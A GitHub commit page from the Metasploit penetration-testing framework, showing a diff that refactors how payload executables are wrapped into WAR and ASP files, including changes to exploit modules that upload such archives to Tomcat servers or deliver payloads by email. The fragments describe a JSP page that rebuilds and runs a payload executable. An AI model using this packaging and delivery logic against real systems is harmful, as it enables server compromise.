Permalink
Browse files

rework to_jsp_war a bit, fix uses, default msfencode -t war to x86/win32

git-svn-id: file:///home/svn/framework3/trunk@10397 4d416f70-5f16-0410-b530-b9f4589650da
  • Loading branch information...
1 parent 2cd8b7d commit bd1eeb372224323c55be4f45933683a0f6d75b1c @jduck jduck committed Sep 20, 2010
@@ -97,7 +97,8 @@ def self.generate_simple(payload, opts)
plat = Msf::Module::PlatformList.transform(opts['Platform'])
tmp_plat = plat.platforms
- buf = Msf::Util::EXE.to_jsp_war(framework, arch, tmp_plat, e.encoded, {:persist => false, :template => altexe})
+ exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :template => altexe})
+ buf = Msf::Util::EXE.to_jsp_war(exe, {:persist => false })
else
# Serialize the generated payload to some sort of format
buf = Buffer.transform(e.encoded, fmt)
@@ -216,7 +216,8 @@ def encode(token, data, encoder, options)
output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
when 'war'
tmp_plat = plat.platforms
- output = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
+ exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :template => altexe})
+ output = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
else
fmt ||= "ruby"
output = Msf::Simple::Buffer.transform(raw, fmt)
View
@@ -813,9 +813,7 @@ def self.to_war(jsp_raw, opts={})
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload.
# The jsp page converts the hexdump back to a normal .exe file and places it in
# the temp directory. The payload .exe file is then executed.
- def self.to_jsp_war(framework, arch, plat, code='', opts={})
-
- exe = to_executable(framework, arch, plat, code, opts)
+ def self.to_jsp_war(exe, opts={})
# begin <payload>.jsp
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -172,9 +172,8 @@ def exploit
:jsp_name => jsp_name
})
else
- @war_data = Msf::Util::EXE.to_jsp_war(framework,
- arch, plat,
- p.encoded,
+ exe = generate_payload_exe({ :code => p.encoded })
+ @war_data = Msf::Util::EXE.to_jsp_war(exe,
{
:app_name => app_base,
:jsp_name => jsp_name
@@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
@@ -182,16 +183,10 @@ def exploit
print_status("Using manually select target \"#{mytarget.name}\"")
end
- # set arch/platform from the target
- arch = mytarget['Arch']
- plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
-
# Generate the WAR containing the EXE containing the payload
jsp_name = rand_text_alphanumeric(4+rand(32-4))
- war = Msf::Util::EXE.to_jsp_war(framework,
- arch, plat,
- payload.encoded,
- :jsp_name => jsp_name)
+ exe = generate_payload_exe
+ war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
app_base = rand_text_alphanumeric(4+rand(32-4))
query_str = "?path=/" + app_base
@@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
# This module sends email messages via smtp
#
include Msf::Exploit::Remote::SMTPDeliver
+ include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
@@ -142,16 +143,7 @@ def exploit
if (target.arch.include?(ARCH_CMD))
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
else
- bin = ''
-
- if(target.arch.index(ARCH_PPC))
- bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded)
- end
-
- if(target.arch.index(ARCH_X86))
- bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded)
- end
-
+ bin = generate_payload_exe
cmd = Rex::Text.encode_base64(bin, "\r\n")
end
@@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
@@ -55,13 +56,12 @@ def initialize(info = {})
def exploit
- arch = target['Arch']
- plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
-
# Generate the WAR containing the EXE containing the payload
app_base = rand_text_alphanumeric(4+rand(32-4))
jsp_name = rand_text_alphanumeric(8+rand(8))
- war_data = Msf::Util::EXE.to_jsp_war(framework, arch, plat, payload.encoded, :jsp_name => jsp_name)
+
+ exe = generate_payload_exe
+ war_data = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
res = send_request_cgi(
{
@@ -50,7 +50,8 @@ def initialize
def exploit
# Generate the ASP containing the EXE containing the payload
- asp = Msf::Util::EXE.to_win32pe_asp(framework,payload.encoded)
+ exe = generate_payload_exe
+ asp = Msf::Util::EXE.to_exe_asp(exe)
path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
path_tmp = path.gsub(/\....$/, ".txt")
View
@@ -273,8 +273,11 @@ case cmd
asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
write_encoded(asp)
when 'war'
- tmp_plat = plat.platforms
- war = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
+ arch ||= [ ARCH_X86 ]
+ tmp_plat = plat.platforms if plat
+ tmp_plat ||= Msf::Module::PlatformList.transform('win')
+ exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :template => altexe })
+ war = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
write_encoded(war)
else
fmt ||= "ruby"
View
@@ -156,7 +156,8 @@ if (cmd =~ /^(p|y|r|d|c|j|x|b|v|w)/)
arch = payload.arch
plat = payload.platform.platforms
- exe = Msf::Util::EXE.to_jsp_war($framework, arch, plat, buf)
+ exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
+ exe = Msf::Util::EXE.to_jsp_war(exe)
if(exe)

0 comments on commit bd1eeb3

Please sign in to comment.